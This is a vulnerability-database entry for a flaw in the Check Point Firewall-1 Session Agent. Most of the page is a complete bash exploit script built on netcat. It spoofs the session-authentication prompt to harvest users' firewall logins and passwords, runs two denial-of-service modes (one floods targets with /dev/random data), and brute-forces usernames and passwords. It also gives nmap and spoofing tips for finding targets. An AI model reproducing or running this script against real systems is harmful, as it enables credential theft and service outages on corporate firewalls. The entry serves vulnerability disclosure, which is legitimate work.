Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 30 Views

Vulnerability in Check Point Session Agent allows brute force username and password attack

Code

                                                source: http://www.securityfocus.com/bid/1662/info
 
A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password.


#!/bin/bash
#
# Fwsa (FW-1 session auth), tested on linux 2.4.0 beta
# ( Swiss army knife for FW-1 Session authentication. )
#
# successfully tested against Session Authentication Agents 4.0 & 4.1
# and Firewall-1 module 4.0 
#
# please don't use it for any illegal activity but only for educational purposes
#
#         Gregory Duchemin   ( aka c3rb3r )
# 
#     for help or bug report <==> [email protected]

# 0ctober 2000

function Usage()
{
echo
echo " Usage: "$0" Targets_filez  type_of_attack [FQDN name] [dict file] [0/1/2/3]"
echo
echo "================proof of concept // Version 1.0 ==="
echo "==================================================="
echo
echo " Note: Targets_filez is a plaintext file with all IPs to check"
echo "       I recommend u to make it with the help of Nmap "
echo "       Try nmap -T Insane -sS -P0 -p 261 RANGE_IP to look for listening session agents." 
echo " Note: Type of attack is 1 for password recovery, 2 for stupid DOS, 3 for "
echo "       dangerous DOS and 4 for bruteforcing users password on Firewall"
echo
echo "       * password recovery will turn you back user FW1 login/password"
echo "       * stupid DOS just open a connexion and wait for nothing"
echo "         It'll block all other connexion and so, user access."
echo "       * dangerous DOS will enter an infinite loop within it send garbage."
echo "         Will crash some weak systems. ( find wich ones ;) ) "
echo "       * passwords Brute-force try to guess users password onto "
echo "         the corporate firewall. Have to supply an external address in filez"
echo "         to force firewall to connect on local port ( port 261 )."
echo
echo " Note: FQDN name is Fully Qualified Domain name, default:firewall used for FW-1 "
echo " banner."
echo " Note: Change the internal variables filez and logfile to store your stock into, default:\"...\""
echo " Note: this proggy needs netcat to nicely work."
echo 
echo " G00d Hunt !"
echo 
echo " author:  Gregory Duchemin  ( aka c3rb3r )"
echo "                          [email protected] "
echo 
echo " N0 c0pyright, feel free to use or modify it as u want"
echo
}

signal_handler()
{
sync
echo 
echo "Warning: target aborted, continuing with next one..."
echo
echo
}


filtered()
{
echo
echo "Error: target port 261 doesn't respond"
echo "       it should be because target is filtering or is down." 
echo "       Anyway, try again spoofing firewall address."
echo "       Arptool should be helpfull to do the job"
echo
}

closed()
{
echo
echo "Error: target port 261 is closed"
echo "       continuing with next ip." 
echo
echo
}

simple_dos()
{
for i in $ip; do 
echo
echo "***********************************************"
echo "Launching stupid DOS attack against "$i" !"
echo "***********************************************"
echo
echo
{
sleep $timeout 
sync
}| nc -n -w 2 -v $i 261 > $logfile 2>&1
if [ `awk '{ print $7 }' $logfile` = "refused" ]; then
closed
else
if [ `awk '{ print $7 }' $logfile` = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


dangerous_dos()
{
for i in $ip; do 
echo
echo "****************************************************"
echo "Launching dangerous DOS attack against "$i" !"
echo "****************************************************"
echo
echo
{
sleep $timeout 
cat /dev/random
}| nc -n -w 2 -v $i 261  > $logfile 2>&1
if [ $( awk '{ print $7 }' $logfile) = "refused" ]; then
closed
else 
if [ $(awk '{ print $7 }' $logfile) = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


password_recovery()
{
for i in $ip; do 
echo
echo "*****************************************************"
echo "Launching FW1 password recovery against "$i" !"
echo "*****************************************************"
echo
echo
{
sleep $timeout 
sync 
cat /dev/null > $logfile
echo "220 FW-1 Session Authentication Request from "$name
echo "211 253141732 1988 3931424644 80 5"
echo "331 User:"
sync
# synchronisation of buffers and disks  
while [ ! -s $logfile ]; do 
# waiting for user info supply in logfile 
sleep 1
done
user=$(cat $logfile)

echo "331 *Firewall-1 password:"

while [ `wc -l $logfile|awk '{ print $1 }'` -eq 1 ]; do
sleep 1
done
sed 's/'$user'//' $logfile | sed '/./,$!d' > ./tmp
password=$(cat ./tmp)
rm ./tmp
echo "200 User $user authenticated by Firewall-1 authentication."
echo "230 OK"
sleep 2
echo >> $filez
echo >> $filez
echo "===== Password recovery ============================================" >> $filez
echo "====================================================================" >> $filez
echo " Target <==> $i" >> $filez 
echo >> $filez 
echo " Username <==> $user    Password <==> $password" >> $filez
echo >> $filez 
echo >> $filez 
exit 0
}| nc  -n -w 2 -v $i 261  > $logfile
if [ -f ./tmp ]; then
rm tmp
fi
done
if [ -f $logfile ]; then
rm $logfile
fi
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



password_bruteforce()
{
for i in $ip; do 


echo
echo "*****************************************************"
echo "Launching FW1 password BruteForce attack "
echo "*****************************************************"
echo
echo


if [ -s $logfile ]; then
cat /dev/null > $logfile
fi

# We use as many char string as there are in password because
# most of the time, admin won't use a "real" random generator but 
# a program that use a basic scheme.
# if u understand this scheme and modify the string below, u should be able to increase significantly your chances of succeed.  
# if passwords in your company are less than 8 chars, comment useless lines 

# password scheme:
# for instance, first letter could be uppercase ( A or H string depending on order byte ).
# initial values are commented

#A='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
A='A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'

B='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
C='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
D='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
E='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
F='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
G='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
H='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
{
# we send a probe to anywhere in the world port 80 (or whatever fw rules allow), waiting for FW answer 
nc -w 2 -n $i 80 > /dev/null 2>&1

# waiting for invitation caller  
grep 331 $logfile > /dev/null
while [ $? -eq 1 ]; 
do 
grep 331 $logfile > /dev/null
done

# we try now our login names until we get back the magic cookie
# actually we read login names in a file, it should be more efficient since most of admins use real names.
# u can use brute force to guess login in the same manner we use it for passwords.
# in this case, just change the few lines below to use chars strings from 1 up to 8 loops.

for user in $username
do
cat /dev/null > $logfile
sync
echo $user

# 530 eg NOTOK, error response
# fw1 session authentication reply with an error code if username doesn't exist, that's a flaw in itself.

sleep $timeout 

grep 530 $logfile > /dev/null
if [ $? -eq 1 ]; then
echo "===== Password Brute force ============================================" >> $filez
echo "====================================================================" >> $filez
echo >> $filez
echo >> $filez
echo " login ok :"$user >> $filez
echo >> $filez
echo >> $filez
echo $user >> ./.users
sync
continue
fi
done

if [ ! -f ./.users ]; then 
exit
fi

targets=`cat ./.users`
rm ./.users
 
# Now it's time  we try to guess password for this user
# if passwords in your company are less than 8 chars, comment useless loops.


for user in $targets
do
 
for i8 in $H 
do
for i7 in $G
do

# this rule is optional
if [ $i7 = $i8 ]; then
continue
fi

for i6 in $F
do

# this rule is optional
if [ $i6 = $i7 ]; then
continue
fi

for i5 in $E
do

# this rule is optional
if [ $i5 = $i6 ]; then
continue
fi

for i4 in $D 
do

# this rule is optional
if [ $i4 = $i5 ]; then
continue
fi

for i3 in $C
do

# this rule is optional
if [ $i3 = $i4 ]; then
continue
fi

for i2 in $B
do

# this rule is optional
if [ $i2 = $i3 ]; then
continue
fi

for i1 in $A
do

# this rule is optional
if [ $i1 = $i2 ]; then
continue
fi


# waiting for server

grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done


# order is fetched by the user (see usage), and may be usefull for multi-process bruteforce.

if [ $order -eq 0 ]; then
echo $i1$i2$i3$i4$i5$i6$i7$i8
# for debugging purpose
echo "trying $i1$i2$i3$i4$i5$i6$i7$i8" >> $filez
else
if [ $order -eq 1 ]; then
echo $i1$i7$i6$i5$i4$i3$i2$i8
echo "trying $i1$i7$i6$i5$i4$i3$i2$i8" >> $filez
else
if [ $order -eq 2 ]; then
echo $i1$i5$i8$i2$i4$i7$i3$i6
echo "trying $i1$i5$i8$i2$i4$i7$i3$i6" >> $filez
else
echo $i1$i2$i4$i7$i8$i3$i6$i5
echo "trying $i1$i2$i4$i7$i8$i3$i6$i5" >> $filez
fi
fi
fi
sync 
usleep $utimeout 

# 230 eg OK, password is correct 

grep 230 $logfile > /dev/null
if [ $? -eq 0 ]; then
echo >> $filez
if [ $order -eq 0 ]; then
echo "password ok :"$i1$i2$i3$i4$i5$i6$i7$i8 >> $filez
else
if [ $order -eq 1 ]; then
echo "password ok :"$i8$i7$i6$i5$i4$i3$i2$i1 >> $filez
else
if [ $order -eq 2 ]; then
echo "password ok :"$i8$i5$i1$i2$i4$i7$i3$i6 >> $filez
else
echo "password ok :"$i2$i1$i4$i7$i8$i3$i6$i5 >> $filez
fi
fi
fi
echo >> $filez
echo >> $filez
exit
fi

# we r supposed to reinject username each time, this one we just discovered
# but connexion is still alive that's the major flaw.

grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done

echo $user
done
done
done
done
done
done
done
done

done
}| nc  -n  -l -p 261  > $logfile 2>&1

#if [ -f $logfile ]; then
#rm $logfile
#fi
done
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



if [ $# -lt 2 ]; then
Usage
exit
fi

nc -h  > /dev/null 2>&1
if [ ! $? -eq 1 ]; then
Usage
echo
echo
echo "Error: "$0" needs netcat to properly run, please check u have it in your \$PATH or compile it now."
echo
exit
fi 

if [ ! $2 -eq 1 ] && [ ! $2 -eq 2 ] && [ ! $2 -eq 3 ] && [ ! $2 -eq 4 ]; then
Usage
echo
echo
echo "Error: Value for type of attack is out of range."
echo
exit
fi

if [ ! -s $1 ]; then
Usage
echo
echo
echo "Error: "$0" didn't find your Targets_ip filez."
echo
exit
fi

trap signal_handler SIGINT


ip=`cat $1`


# filez is where results are writen, please change it for your configuration
# don't forget to change this values for every instance of the process, u would like to launch
filez="./......"
logfile="./logfile4"

cat /dev/null > $filez

name="fwl01"

# timeout is connexion timer when waiting for a server response.

timeout=2


# utimeout is pretty important, specifically for brute force attack, lower value means faster loop but if too low, fw reply would be mistaken
# that depends of your network round trip time and average firewall cpu usage.
# try different values first: default 22 millisecond

utimeout=22000

if [ $# -gt 2 ]; then
name=$3
fi
if [ $# -gt 2 ] && [ $2 -eq 4 ]; then
if [ ! -s $3 ]; then
Usage
echo
echo "Error: "$0" didn't find your dict filez or it's empty."
echo
exit
fi
username=`cat $3`
fi

order=0
if [ $# -gt 3 ]; then
order=$4
fi

if [ -f $logfile ]; then
rm -f $logfile
fi

case "$2" in 
1)
   password_recovery
   ;;

2)
  simple_dos
  ;;

3)
  dangerous_dos
  ;;

4)
  password_bruteforce
  if [ -s $filez ]; then
  cat $filez
  fi
  ;;

*)
  exit 1
esac
exit

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
check point session agentfirewall-1dictionary attackbrute forcevulnerability
30